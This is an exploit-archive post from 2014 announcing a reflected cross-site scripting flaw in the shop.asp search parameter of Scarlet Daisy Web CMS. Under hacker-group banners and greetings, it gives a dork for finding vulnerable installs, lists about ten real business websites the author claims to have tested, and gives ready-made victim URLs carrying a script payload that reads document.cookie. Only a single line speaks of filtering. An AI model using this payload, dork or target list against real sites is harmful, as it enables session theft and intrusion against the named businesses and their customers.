Home / exploits Scarlet Daisy Web CMS Cross Site Scripting
Posted on 10 December 2014
Scarlet Daisy Web CMS <= Reflected XSS Vulnerability ~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+] Author : KnocKout [~] Contact : knockout@e-mail.com.tr [~] HomePage : http://h4x0resec.blogspot.com [~] Greetz: DaiMon, PRoMaX, _UnDeRTaKeR_ , BackDoor Septemb0x , BARCOD3 , ZoRLu, ( milw00rm.com ) .__ _____ _______ | |__ / | |___ __ _ \_______ ____ | | / | | / / /_ \_ __ \_/ __ | Y / ^ /> < \_/ | / ___/ |___| /\____ |/__/\_ \_____ /__| \___ > / |__| / / / _____________________________ / _____/\_ _____/\_ ___ \_____ | __)_ / / http://h4x0resec.blogspot.com / | \ \____ /_______ //_______ / \______ / / / / ~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~ |~App. : Scarlet Daisy Web Web Content Management System. |~Software: http://www.scarletdaisy.com |~Vulnerability Style : Cross Site Scripting |[~]Date : "09.12.2014" |[~]Tested on : Kali Linux |[Keywords/DORK]: "Powered by Scarlet Daisy Web Content Management System." ~~~~~~~~~~~~~~~~[~]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Tested on http://www.scarletdaisy.com http://www.crossstitchworkshop.co.uk http://www.camelotcandlesupplies.co.uk http://www.claymorehomes.co.uk http://www.papiransky.co.uk http://www.sfp-ifa.co.uk http://www.hattongarage.co.uk http://www.j-a-c-k.org http://ahnaylortextiles.co.uk http://www.ladymire.co.uk .. .. ==============[INFO]====================================== shop.asp 'search' parameter is not safe. harmful character, they should be filtered. ==============[Exploitation]============================== HTTP://[VICTIM]/shop.asp?action=form&search= POST: [Cross Site Scripting] HTTP://[VICTIM]/shop.asp?search= POST: [Cross Site Scripting] HTTP://[VICTIM]/shop.asp?action=form&search=<b>HI WORLD</b>"><script>alert(document.cookie)</script>
